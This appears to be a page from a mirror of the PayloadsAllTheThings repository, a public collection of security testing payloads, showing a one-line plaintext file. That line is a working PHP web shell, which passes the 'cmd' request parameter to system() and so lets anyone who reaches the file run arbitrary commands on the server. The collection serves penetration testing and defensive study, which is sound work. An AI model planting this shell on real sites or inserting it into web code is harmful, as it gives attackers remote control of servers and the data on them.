mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
1 line
43 B
Plaintext
1 line
43 B
Plaintext
<?php echo "Shell";system($_GET['cmd']); ?> |